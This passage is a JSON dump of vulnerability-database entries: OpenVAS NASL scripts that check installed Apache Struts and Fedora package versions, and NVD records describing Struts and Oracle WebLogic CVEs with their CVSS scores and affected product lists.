"http://plugins.openvas.org/nasl.php?oid=1361412562310808523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for struts FEDORA-2016-21bd6a33af\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808523\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-02 06:38:44 +0200 (Sat, 02 Jul 2016)\");\n script_cve_id(\"CVE-2016-1181\", \"CVE-2016-1182\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for struts FEDORA-2016-21bd6a33af\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'struts'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"struts on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-21bd6a33af\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z74JLHOBT3TZVPAHD7FUPFP3LYAOQTR7\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"struts\", rpm:\"struts~1.3.10~18.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T18:54:08", "description": "This host is running Apache Struts and is\n prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-11-18T00:00:00", "type": "openvas", "title": "Apache Struts Multiple Vulnerabilities-01 Nov16 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0899", "CVE-2016-1182", "CVE-2016-1181"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310809478", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809478", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_mult_vuln01_nov16_lin.nasl 60709 2016-11-18 14:43:17 +0530 Nov$\n#\n# Apache Struts Multiple Vulnerabilities-01 Nov16 (Linux)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809478\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2016-1181\", \"CVE-2016-1182\", \"CVE-2015-0899\");\n script_bugtraq_id(91068, 91067, 74423);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-11-18 14:46:45 +0530 (Fri, 18 Nov 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Apache Struts Multiple Vulnerabilities-01 Nov16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An 'actionServlet.java' script mishandles multithreaded access to an\n ActionForm instance.\n\n - An 'actionServlet.java' script does not properly restrict the Validator\n configuration.\n\n - An error in the MultiPageValidator implementation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code or cause a denial of service or conduct\n cross-site scripting or bypass intended access restrictions.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 1.0 through 1.3.10\n on Linux.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://jvn.jp/en/jp/JVN03188560/index.html\");\n script_xref(name:\"URL\", value:\"http://jvn.jp/en/jp/JVN65044642/index.html\");\n script_xref(name:\"URL\", value:\"http://jvn.jp/en/jp/JVN86448949/index.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\n## Vulnerable version according to Advisory\nif(appVer =~ \"^(1\\.)\")\n{\n if(version_in_range(version:appVer, test_version:\"1.0\", test_version2:\"1.3.10\"))\n {\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"WillNotFix\");\n security_message(data:report, port:appPort);\n exit(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-05T18:54:34", "description": "This host is running Apache Struts and is\n prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-11-18T00:00:00", "type": "openvas", "title": "Apache Struts Multiple Vulnerabilities-01 Nov16 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0899", "CVE-2016-1182", "CVE-2016-1181"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310808538", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808538", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_mult_vuln01_nov16_win.nasl 60709 2016-11-18 14:43:17 +0530 Nov$\n#\n# Apache Struts Multiple Vulnerabilities-01 Nov16 (Windows)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808538\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2016-1181\", \"CVE-2016-1182\", \"CVE-2015-0899\");\n script_bugtraq_id(91068, 91067, 74423);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-11-18 14:43:17 +0530 (Fri, 18 Nov 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Apache Struts Multiple Vulnerabilities-01 Nov16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An 'actionServlet.java' script mishandles multithreaded access to an\n ActionForm instance.\n\n - An 'actionServlet.java' script does not properly restrict the Validator\n configuration.\n\n - An error in the MultiPageValidator implementation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code or cause a denial of service or conduct\n cross-site scripting or bypass intended access restrictions.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 1.0 through 1.3.10\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://jvn.jp/en/jp/JVN03188560/index.html\");\n script_xref(name:\"URL\", value:\"http://jvn.jp/en/jp/JVN65044642/index.html\");\n script_xref(name:\"URL\", value:\"http://jvn.jp/en/jp/JVN86448949/index.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n\n## Vulnerable version according to Advisory\nif(appVer =~ \"^(1\\.)\")\n{\n if(version_in_range(version:appVer, test_version:\"1.0\", test_version2:\"1.3.10\"))\n {\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"WillNotFix\");\n security_message(data:report, port:appPort);\n exit(0);\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-05T15:16:25", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Servlet Runtime). Supported versions that are affected are 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebLogic Server. CVSS 3.0 Base Score 7.2 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 2.7}, "published": "2017-04-24T19:59:00", "type": "cve", "title": "CVE-2017-3531", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3531"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:12.2.1.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0"], "id": "CVE-2017-3531", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3531", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T15:22:23", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T02:59:00", "type": "cve", "title": "CVE-2017-5638", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2021-02-24T12:15:00", "cpe": ["cpe:/a:apache:struts:2.3.24.2", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.5.4", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.24.3", "cpe:/a:apache:struts:2.3.27", "cpe:/a:apache:struts:2.3.29", "cpe:/a:apache:struts:2.3.10", "cpe:/a:apache:struts:2.3.26", "cpe:/a:apache:struts:2.3.22", "cpe:/a:apache:struts:2.3.20.2", "cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.3.21", "cpe:/a:apache:struts:2.3.17", "cpe:/a:apache:struts:2.3.6", "cpe:/a:apache:struts:2.3.28", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.3.5", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.3.24", "cpe:/a:apache:struts:2.5.9", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.3.13", "cpe:/a:apache:struts:2.5.8", "cpe:/a:apache:struts:2.3.20", "cpe:/a:apache:struts:2.3.20.3", "cpe:/a:apache:struts:2.5.6", "cpe:/a:apache:struts:2.3.9", "cpe:/a:apache:struts:2.5.10", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.3.31", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.3.28.1", "cpe:/a:apache:struts:2.3.19", "cpe:/a:apache:struts:2.3.11", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.5.2", "cpe:/a:apache:struts:2.5.5", "cpe:/a:apache:struts:2.5.3", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.5.7", "cpe:/a:apache:struts:2.3.16.3", "cpe:/a:apache:struts:2.3.25", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.3.23", "cpe:/a:apache:struts:2.5.1", "cpe:/a:apache:struts:2.5", "cpe:/a:apache:struts:2.3.30", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.3.20.1", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.3.24.1"], "id": "CVE-2017-5638", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.24.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T15:16:30", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2017-04-24T19:59:00", "type": "cve", "title": "CVE-2017-3506", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3506"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:12.2.1.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0"], "id": "CVE-2017-3506", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3506", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:57:14", "description": "ActionServlet.java in Apache Struts 1 1.x through 1.3.10 mishandles multithreaded access to an ActionForm instance, which allows remote attackers to execute arbitrary code or cause a denial of service (unexpected memory access) via a multipart request, a related issue to CVE-2015-0899.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-07-04T22:59:00", "type": "cve", "title": "CVE-2016-1181", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0899", "CVE-2016-1181"], "modified": "2020-07-15T03:15:00", "cpe": ["cpe:/a:apache:struts:1.0.2", "cpe:/a:apache:struts:1.0", "cpe:/a:apache:struts:1.2.9", "cpe:/a:apache:struts:1.3.9", "cpe:/a:apache:struts:1.2.6", "cpe:/a:apache:struts:1.3.7", "cpe:/a:oracle:banking_platform:2.3.0", "cpe:/a:oracle:banking_platform:2.4.1", "cpe:/a:apache:struts:1.2.7", "cpe:/a:apache:struts:1.3.8", "cpe:/a:oracle:banking_platform:2.4.0", "cpe:/a:apache:struts:1.2.3", "cpe:/a:apache:struts:1.3.10", "cpe:/a:apache:struts:1.2.1", "cpe:/a:apache:struts:1.0.1", "cpe:/a:oracle:banking_platform:2.5.0", "cpe:/a:apache:struts:1.2.8", "cpe:/a:apache:struts:1.1", "cpe:/a:apache:struts:1.2.5", "cpe:/a:apache:struts:1.2.0", "cpe:/a:apache:struts:1.2.2", "cpe:/a:oracle:portal:11.1.1.6", "cpe:/a:apache:struts:1.3.6", "cpe:/a:apache:struts:1.2.4", "cpe:/a:apache:struts:1.3.5"], "id": "CVE-2016-1181", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1181", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.1:b1:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.1:b2:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:1.3.8:*:*:*:*:*:*:*", 